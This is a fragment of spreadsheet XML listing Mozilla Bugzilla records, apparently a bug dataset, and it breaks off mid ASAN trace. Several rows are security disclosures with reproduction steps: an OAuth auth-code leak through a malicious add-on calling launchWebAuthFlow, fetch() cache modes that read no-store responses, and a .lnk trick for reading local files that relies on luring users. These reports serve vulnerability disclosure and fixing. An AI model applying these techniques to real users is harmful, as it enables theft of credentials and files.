      <c r="A3482" t="n">
        <v>1148090</v>
      </c>
      <c r="B3482" t="inlineStr">
        <is>
          <t>2015-03-26 13:57:43 -0700</t>
        </is>
      </c>
      <c r="C3482" t="inlineStr">
        <is>
          <t>Update forced versions for correlations for Firefox cycle starting 2015-03-31</t>
        </is>
      </c>
      <c r="D3482" t="inlineStr">
        <is>
          <t>2015-07-08 09:43:44 -0700</t>
        </is>
      </c>
      <c r="E3482" t="n">
        <v>1</v>
      </c>
      <c r="F3482" t="n">
        <v>1</v>
      </c>
      <c r="G3482" t="n">
        <v>4</v>
      </c>
      <c r="H3482" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3482" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3482" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K3482" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3482" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3482" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3482" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3482" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3482" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q3482" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3482" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3482" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3482" t="n">
        <v>1</v>
      </c>
      <c r="U3482" t="n">
        <v>0</v>
      </c>
      <c r="V3482" t="n">
        <v>3</v>
      </c>
      <c r="W3482" t="inlineStr">
        <is>
          <t>We'll uplift another set of Firefox versions on 2015-03-30, so we'll need to update the forced versions for correlation again in the days after that.
I'll do that patch again, no big deal anyhow. :)
We should get that shipped to Socorro prod early next week, if possible.</t>
        </is>
      </c>
      <c r="X3482" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3483">
      <c r="A3483" t="n">
        <v>854001</v>
      </c>
      <c r="B3483" t="inlineStr">
        <is>
          <t>2013-03-22 14:24:21 -0700</t>
        </is>
      </c>
      <c r="C3483" t="inlineStr">
        <is>
          <t>crash in mozilla::dom::InstanceClassHasProtoAtDepth</t>
        </is>
      </c>
      <c r="D3483" t="inlineStr">
        <is>
          <t>2013-11-25 16:41:16 -0800</t>
        </is>
      </c>
      <c r="E3483" t="n">
        <v>1</v>
      </c>
      <c r="F3483" t="n">
        <v>1</v>
      </c>
      <c r="G3483" t="n">
        <v>3</v>
      </c>
      <c r="H3483" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3483" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3483" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K3483" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3483" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3483" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3483" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3483" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3483" t="inlineStr">
        <is>
          <t>[adv-main21+]</t>
        </is>
      </c>
      <c r="Q3483" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3483" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3483" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T3483" t="n">
        <v>1</v>
      </c>
      <c r="U3483" t="n">
        <v>0</v>
      </c>
      <c r="V3483" t="n">
        <v>28</v>
      </c>
      <c r="W3483" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-d2b6ee93-7d37-4078-a801-a34c02130322 .
============================================================= 
STR: I tried to open the links in bug 853772 comment 3
mozilla::dom::InstanceClassHasProtoAtDepth	dom/bindings/BindingUtils.cpp:619
TestShouldDOMCall	js/src/ion/IonBuilder.cpp:4215
mozilla::ErrorResult::ReportJSException	dom/bindings/BindingUtils.cpp:154
PR_GetCurrentThread	nsprpub/pr/src/pthreads/ptthread.c:621
js::ion::IonBuilder::makeCallHelper	js/src/ion/IonBuilder.cpp:4341
js::TempAllocPolicy::malloc_	obj-firefox/dist/include/js/Utility.h:151
js::ion::IonBuilder::makeCallBarrier	js/src/ion/IonBuilder.cpp:4380
js::ion::IonBuilder::jsop_call	js/src/ion/IonBuilder.cpp:4160
js::ion::IonBuilder::getPropTryConstant	js/src/ion/IonBuilder.cpp:6563
js::ion::MUnbox::New	js/src/ion/MIR.h:1872
PR_GetCurrentThread	nsprpub/pr/src/pthreads/ptthread.c:621
js::ion::MPassArg::New	js/src/ion/MIR.h:2104
js::ion::IonBuilder::inspectOpcode	js/src/ion/IonBuilder.cpp:932
js::ion::MBasicBlock::NewPopN	js/src/ion/MIRGraph.cpp:127
PR_GetCurrentThread	nsprpub/pr/src/pthreads/ptthread.c:621
PR_GetThreadPrivate	nsprpub/pr/src/threads/prtpd.c:200
js::ion::IonBuilder::processCondSwitchBody	js/src/ion/IonBuilder.cpp:2503
js::ion::IonBuilder::processCondSwitchCase	js/src/ion/IonBuilder.cpp:2474
js::ion::IonBuilder::processCondSwitchBody	js/src/ion/IonBuilder.cpp:2503
js::ion::IonBuilder::snoopControlFlow	js/src/ion/CompileInfo-inl.h:56
js::ion::IonBuilder::traverseBytecode	js/src/ion/IonBuilder.cpp:684
js::ion::IonBuilder::build	js/src/ion/IonBuilder.cpp:346
js::VectorImpl&lt;js::types::CompilerOutput, 0ul, js::TempAllocPolicy, false&gt;::grow	obj-firefox/dist/include/js/Utility.h:168
js::ion::SequentialCompileContext::compile	js/src/ion/Ion.cpp:1293
js::ion::IonBuilder::IonBuilder	js/src/ion/IonBuilder.cpp:48
js::ion::Compile&lt;js::ion::SequentialCompileContext&gt;	js/src/ion/Ion.cpp:1248
icon-theme.cache@0x135e000	
js::CallObject::createForFunction	js/src/gc/Barrier-inl.h:74
js::CallObject::createForFunction	js/src/gc/Barrier-inl.h:74
js::ion::CanEnterAtBranch	js/src/ion/Ion.cpp:1514
js::Interpret	js/src/jsinterp.cpp:1591
[...]</t>
        </is>
      </c>
      <c r="X3483" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3484">
      <c r="A3484" t="n">
        <v>411835</v>
      </c>
      <c r="B3484" t="inlineStr">
        <is>
          <t>2008-01-10 18:34:45 -0800</t>
        </is>
      </c>
      <c r="C3484" t="inlineStr">
        <is>
          <t>Crash [@ GetChildListNameFor] with -moz-column, position:absolute</t>
        </is>
      </c>
      <c r="D3484" t="inlineStr">
        <is>
          <t>2013-02-23 17:10:02 -0800</t>
        </is>
      </c>
      <c r="E3484" t="n">
        <v>1</v>
      </c>
      <c r="F3484" t="n">
        <v>1</v>
      </c>
      <c r="G3484" t="n">
        <v>3</v>
      </c>
      <c r="H3484" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3484" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3484" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3484" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3484" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3484" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3484" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3484" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3484" t="inlineStr">
        <is>
          <t xml:space="preserve">[sg:critical?][depends on bug 468563, caused bug 526217] </t>
        </is>
      </c>
      <c r="Q3484" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3484" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3484" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T3484" t="n">
        <v>1</v>
      </c>
      <c r="U3484" t="n">
        <v>0</v>
      </c>
      <c r="V3484" t="n">
        <v>38</v>
      </c>
      <c r="W3484" t="inlineStr">
        <is>
          <t>Created attachment 296464
testcase
Loading the testcase makes Firefox crash [@ GetChildListNameFor] dereferencing 0xdddddddd.</t>
        </is>
      </c>
      <c r="X3484" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3485">
      <c r="A3485" t="n">
        <v>936109</v>
      </c>
      <c r="B3485" t="inlineStr">
        <is>
          <t>2013-11-07 11:31:27 -0800</t>
        </is>
      </c>
      <c r="C3485" t="inlineStr">
        <is>
          <t>Xfail test_sms_with_attachments</t>
        </is>
      </c>
      <c r="D3485" t="inlineStr">
        <is>
          <t>2014-01-20 12:01:11 -0800</t>
        </is>
      </c>
      <c r="E3485" t="n">
        <v>1</v>
      </c>
      <c r="F3485" t="n">
        <v>1</v>
      </c>
      <c r="G3485" t="n">
        <v>6</v>
      </c>
      <c r="H3485" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3485" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J3485" t="inlineStr">
        <is>
          <t>Gaia::UI Tests</t>
        </is>
      </c>
      <c r="K3485" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3485" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3485" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N3485" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3485" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3485" t="inlineStr"/>
      <c r="Q3485" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3485" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3485" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3485" t="n">
        <v>1</v>
      </c>
      <c r="U3485" t="n">
        <v>0</v>
      </c>
      <c r="V3485" t="n">
        <v>4</v>
      </c>
      <c r="W3485" t="inlineStr">
        <is>
          <t>Unless this bug is closed by the time this task is completed, please xfail the test.
https://bugzilla.mozilla.org/show_bug.cgi?id=935782</t>
        </is>
      </c>
      <c r="X3485" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3486">
      <c r="A3486" t="n">
        <v>543120</v>
      </c>
      <c r="B3486" t="inlineStr">
        <is>
          <t>2010-01-29 14:24:47 -0800</t>
        </is>
      </c>
      <c r="C3486" t="inlineStr">
        <is>
          <t>Update partner repacks repo with current data</t>
        </is>
      </c>
      <c r="D3486" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:56 -0700</t>
        </is>
      </c>
      <c r="E3486" t="n">
        <v>1</v>
      </c>
      <c r="F3486" t="n">
        <v>1</v>
      </c>
      <c r="G3486" t="n">
        <v>5</v>
      </c>
      <c r="H3486" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3486" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3486" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K3486" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3486" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3486" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3486" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3486" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3486" t="inlineStr"/>
      <c r="Q3486" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3486" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3486" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3486" t="n">
        <v>1</v>
      </c>
      <c r="U3486" t="n">
        <v>0</v>
      </c>
      <c r="V3486" t="n">
        <v>6</v>
      </c>
      <c r="W3486" t="inlineStr">
        <is>
          <t>Kev mentioned that the partner repack data has been changed and should be landed back into the hg repo at some point.
Kev: please point me at an updated dir of partner data when you're ready for me to update the repo.</t>
        </is>
      </c>
      <c r="X3486" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3487">
      <c r="A3487" t="n">
        <v>1614919</v>
      </c>
      <c r="B3487" t="inlineStr">
        <is>
          <t>2020-02-12 04:47:03 -0800</t>
        </is>
      </c>
      <c r="C3487" t="inlineStr">
        <is>
          <t>browser.identity.launchWebAuthFlow() exposes redirect_url no matter what it is.</t>
        </is>
      </c>
      <c r="D3487" t="inlineStr">
        <is>
          <t>2024-05-30 10:11:40 -0700</t>
        </is>
      </c>
      <c r="E3487" t="n">
        <v>1</v>
      </c>
      <c r="F3487" t="n">
        <v>1</v>
      </c>
      <c r="G3487" t="n">
        <v>3</v>
      </c>
      <c r="H3487" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3487" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J3487" t="inlineStr">
        <is>
          <t>Request Handling</t>
        </is>
      </c>
      <c r="K3487" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3487" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3487" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3487" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3487" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3487" t="inlineStr">
        <is>
          <t>sec-high impact on affected users [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main75+]</t>
        </is>
      </c>
      <c r="Q3487" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3487" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3487" t="inlineStr">
        <is>
          <t>mozilla75</t>
        </is>
      </c>
      <c r="T3487" t="n">
        <v>1</v>
      </c>
      <c r="U3487" t="n">
        <v>0</v>
      </c>
      <c r="V3487" t="n">
        <v>38</v>
      </c>
      <c r="W3487" t="inlineStr">
        <is>
          <t>browser.identity.launchWebAuthFlow() always returns the URL to where is redirected in the opened webview. This is a big security issue.
When a Firefox Add-On uses the browser.identity.launchWebAuthFlow() method, the service provider's authorization URL is passed as mandatory parameter. This URL contains among other things the redirect_uri to where the service provider should redirect the user after the user has authenticated at the service provider. The authentication part of the OAuth flow all happens in a webview that Firefox automatically launches after calling launchWebAuthFlow().
The redirect_url used, should be a registered, and thus known, url at the service provider.
This redirect_url can be the url of the add-on itself (obtained by browser.identity.getRedirectURL()), in which case the user will be redirected back to the Add-On. This redirect_url can also be something else.
The current behaviour in Firefox is that the Promise returned by browser.identity.launchWebAuthFlow(), always resolves with the URL to where is redirected. Also in the case this redirect_url is not the same url as obtained by browser.identity.getRedirectURL() (the Add-On url). The result is that I can obtain the code passed in the redirect_url's queryparams, even when the redirect goes to another domain. 
Possible exploit:
An attacker can exploit this when he/she knows at least 1 registered redirect_url of an app that uses OAuth (which does not have to be under his control). He can just call the browser.identity.launchWebAuthFlow("https://auth.service.provider.com/oauth/authorize?client_id=ClientId&amp;redirect_uri=https://the.registered.redirect_uri.org/") with given parameter. It doesn't matter where the service provider redirects the users after authenticating, the Promise returned by browser.identity.launchWebAuthFlow() resolves with the redirect URL, containing the auth_code (assuming the user authenticated correctly)
How to reproduce:
1. Setup up basic OAuth 2 server
2. Register a redirect_uri at the server
Step 1 and 2 represent the OAuth server of an existing (not our own) application
Next steps are the Attackers actions:
3. Make a new Firefox Add-On (only valid manifest.json and background page necessary)
4. Call browser.identity.launchWebAuthFlow({url: "https://authserver.com/auth?redirect_uri=https://the_registered_redirect_url.com&amp;client_id=registeredClientId", interactive: true}).then((url)=&gt;{console.log(url)})
5. Authenticate correctly with OAuth app
6. See the redirect_url logged in console.
Using this method the Attacker can counterfeit an Add-On, and use the same redirect_uri as the real Add-On. But after the redirect, use the Auth code obtained. Even though the Add-On's0 id is not registered at the service provider.</t>
        </is>
      </c>
      <c r="X3487" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3488">
      <c r="A3488" t="n">
        <v>1440775</v>
      </c>
      <c r="B3488" t="inlineStr">
        <is>
          <t>2018-02-23 12:45:56 -0800</t>
        </is>
      </c>
      <c r="C3488" t="inlineStr">
        <is>
          <t>fetch() force-cache mode allows reading responses with cache-control:no-store and pragma:no-cache</t>
        </is>
      </c>
      <c r="D3488" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3488" t="n">
        <v>1</v>
      </c>
      <c r="F3488" t="n">
        <v>1</v>
      </c>
      <c r="G3488" t="n">
        <v>3</v>
      </c>
      <c r="H3488" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3488" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3488" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3488" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3488" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3488" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3488" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3488" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3488" t="inlineStr">
        <is>
          <t>[adv-main59+][adv-esr52.7+]</t>
        </is>
      </c>
      <c r="Q3488" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3488" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3488" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T3488" t="n">
        <v>1</v>
      </c>
      <c r="U3488" t="n">
        <v>0</v>
      </c>
      <c r="V3488" t="n">
        <v>27</v>
      </c>
      <c r="W3488" t="inlineStr">
        <is>
          <t>STR:
1. Open nightly
2. Visit https://http-cache-wanderview.glitch.me/
3. Open network monitor and refresh to get it monitoring
4. Execute in console:
fetch('dontcache.txt', { mode: 'same-origin', cache: 'default' });
fetch('dontcache.txt', { mode: 'same-origin', cache: 'default' })
fetch('dontcache.txt', { mode: 'same-origin', cache: 'force-cache' })
fetch('dontcache.txt', { mode: 'same-origin', cache: 'only-if-cached' })
5. Go back to network monitor and check whether each request went to network or pulled from cache.
In nightly we go to network for the first two requests, but pull from cache for the second two.
Both edge and chrome go to network for the first three requests and fail the only-if-cached request.
This is a security issue because it could allow someone on a public lab computer to extract logged in page data from a previous user of the machine.
It seems we should not be able to see no-store/no-cache responses using fetch() force-cache/only-if-cached values.</t>
        </is>
      </c>
      <c r="X3488" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3489">
      <c r="A3489" t="n">
        <v>665578</v>
      </c>
      <c r="B3489" t="inlineStr">
        <is>
          <t>2011-06-20 09:34:50 -0700</t>
        </is>
      </c>
      <c r="C3489" t="inlineStr">
        <is>
          <t>[ATI on Mac] WebGL demo "To the Road of Ribbon" crashes in useProgram [@ ATIRadeonX3000GLDriver@0x5a4fc]</t>
        </is>
      </c>
      <c r="D3489" t="inlineStr">
        <is>
          <t>2012-03-23 13:28:41 -0700</t>
        </is>
      </c>
      <c r="E3489" t="n">
        <v>1</v>
      </c>
      <c r="F3489" t="n">
        <v>1</v>
      </c>
      <c r="G3489" t="n">
        <v>3</v>
      </c>
      <c r="H3489" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3489" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3489" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3489" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3489" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3489" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3489" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3489" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3489" t="inlineStr">
        <is>
          <t>[sg:critical?][qa+]</t>
        </is>
      </c>
      <c r="Q3489" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3489" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3489" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T3489" t="n">
        <v>1</v>
      </c>
      <c r="U3489" t="n">
        <v>0</v>
      </c>
      <c r="V3489" t="n">
        <v>96</v>
      </c>
      <c r="W3489" t="inlineStr">
        <is>
          <t>Steps to reproduce, at least on my computer:
1. Load http://www.iquilezles.org/apps/shadertoy/.
2. In the dropdown in the upper right, select the 3D demo called "To the Road of Ribbon".
3. Click the "Load" button.
Result: bp-788d54b6-7ae3-47d1-a7f8-2197c2110620
Security-sensitive because it's accessing what looks like a random memory address.
This is a new MacBook Pro with Mac OS X 10.6.7.
Graphics info from about:support:
&gt; Adapter Description: 0x21b00,0x20400
&gt; WebGL Renderer: ATI Technologies Inc. -- ATI Radeon HD 6750M OpenGL Engine -- 2.1 ATI-1.6.34
&gt; GPU Accelerated Windows: 1/1 OpenGL</t>
        </is>
      </c>
      <c r="X3489" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3490">
      <c r="A3490" t="n">
        <v>670514</v>
      </c>
      <c r="B3490" t="inlineStr">
        <is>
          <t>2011-07-10 05:38:54 -0700</t>
        </is>
      </c>
      <c r="C3490" t="inlineStr">
        <is>
          <t>Arbitrary File + Directory read via .lnk files on Windows Share</t>
        </is>
      </c>
      <c r="D3490" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:07 -0700</t>
        </is>
      </c>
      <c r="E3490" t="n">
        <v>1</v>
      </c>
      <c r="F3490" t="n">
        <v>1</v>
      </c>
      <c r="G3490" t="n">
        <v>3</v>
      </c>
      <c r="H3490" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3490" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3490" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3490" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3490" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3490" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3490" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3490" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3490" t="inlineStr">
        <is>
          <t>[sg:high][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3490" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3490" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3490" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T3490" t="n">
        <v>1</v>
      </c>
      <c r="U3490" t="n">
        <v>0</v>
      </c>
      <c r="V3490" t="n">
        <v>91</v>
      </c>
      <c r="W3490" t="inlineStr">
        <is>
          <t>Created attachment 545068
PoC
If a user can be persuaded to visit an HTML file hosted on a public Windows share (see below) then that page can use .lnk files to read arbitrary files and directory listings from their machine.
Imagine we have index.html and foo.lnk in the same directory, with foo.lnk pointing to C:\boot.ini. The HTML file is loaded via a file URL then loads foo.link into an iframe. The contents of boot.ini are displayed but document.location of the iframe is still foo.lnk. However, if the outer page tries to access the iframe, it gets a permission denied error as Firefox still seems to realise that the outer page and inner page are from different origins/directories.
The trick is to have two link files:
baz.lnk -&gt; index.html
foo.lnk -&gt; C:\boot.ini
First we load baz.lnk, then replace baz.lnk with foo.lnk. The HTML page then loads baz.lnk (i.e. itself) using XHR or an iframe. Because the url of the requesting page matches the page loaded, Firefox assumes they're the same origin and allows the contents to be read. Both files and directories can be read in this manner. My PoC uses static .lnk files to read some system directories and the Firefox profile.ini file. However it would be possible to traverse the whole filesystem by grabbing a directory listing and then dynamically generating .lnk files on the server.
There are various method to get the user to load content from a public share (e.g. file://///myhost.com/share/index.html):
1. Use a Java applet to force a drop of the URL (see bug 546909) - PoC uses this
2. Put an innocent looking unhyperlinked HTTP url on the page and get the user to copy/paste it into the location bar. When the user has selected the URL, sneakily change the current selection to the file: URL so that gets copied instead (PoC also has this as an alternative option)
3. Possibly send the file URL in an email. I've not really looked into this, but I seem to recall Outlook will open up \\myhost.com\share\index.html in Firefox if it's the default browser.
This attack could either work within an intranet or possibly over the internet providing your ISP/Corporate firewall doesn't block the relevant ports. My ISP does, but I know not all do. I've attached the PoC as a zip file, as I don't currently have anywhere to host this publically. It's been tested on a few Windows XP machines, not sure if Win7 has any extra security measures to prevent things like this.
Finally, this bug was found in my own time, so I promise it won't be blogged, tweeted or publicised in any way before it's fixed.</t>
        </is>
      </c>
      <c r="X3490" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3491">
      <c r="A3491" t="n">
        <v>1793314</v>
      </c>
      <c r="B3491" t="inlineStr">
        <is>
          <t>2022-10-01 20:47:22 -0700</t>
        </is>
      </c>
      <c r="C3491" t="inlineStr">
        <is>
          <t>heap-use-after-free in font loading using FontFace from worker thread</t>
        </is>
      </c>
      <c r="D3491" t="inlineStr">
        <is>
          <t>2024-05-30 11:01:05 -0700</t>
        </is>
      </c>
      <c r="E3491" t="n">
        <v>1</v>
      </c>
      <c r="F3491" t="n">
        <v>1</v>
      </c>
      <c r="G3491" t="n">
        <v>3</v>
      </c>
      <c r="H3491" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3491" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3491" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K3491" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3491" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3491" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3491" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3491" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P3491" t="inlineStr">
        <is>
          <t>[adv-main107+]</t>
        </is>
      </c>
      <c r="Q3491" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3491" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3491" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3491" t="n">
        <v>1</v>
      </c>
      <c r="U3491" t="n">
        <v>0</v>
      </c>
      <c r="V3491" t="n">
        <v>14</v>
      </c>
      <c r="W3491" t="inlineStr">
        <is>
          <t>Loading user fonts via `FontFace()` from workers isn't thread-safe and may cause a heap-use-after-free.
Two ASAN UAF samples on `m-c-20220930214439-asan-opt`:
```cpp
==521246==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030001a4f88 at pc 0x7f0f6c3ca7b6 bp 0x7f0f5410c130 sp 0x7f0f5410c128
READ of size 8 at 0x6030001a4f88 thread T228
    #0 0x7f0f6c3ca7b5 in load /builds/worker/fetches/sysroot-x86_64-linux-gnu/usr/lib/gcc/x86_64-linux-gnu/7.5.0/../../../../include/c++/7.5.0/bits/atomic_base.h:396:9
    #1 0x7f0f6c3ca7b5 in get /builds/worker/workspace/obj-build/dist/include/nsISupportsImpl.h:389:19
    #2 0x7f0f6c3ca7b5 in operator unsigned long /builds/worker/workspace/obj-build/dist/include/nsISupportsImpl.h:385:56
    #3 0x7f0f6c3ca7b5 in gfxCharacterMap::NotifyMaybeReleased() /builds/worker/checkouts/gecko/gfx/thebes/gfxFontEntry.cpp:63:7
    #4 0x7f0f72342cd7 in Release /builds/worker/workspace/obj-build/dist/include/gfxFontEntry.h:84:14
    #5 0x7f0f72342cd7 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
    #6 0x7f0f72342cd7 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
    #7 0x7f0f72342cd7 in ~RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:81:7
    #8 0x7f0f72342cd7 in mozilla::dom::FontFaceImpl::~FontFaceImpl() /builds/worker/checkouts/gecko/layout/style/FontFaceImpl.cpp:75:1
    #9 0x7f0f7233f976 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FontFaceImpl.h:37:3
    #10 0x7f0f7233f976 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
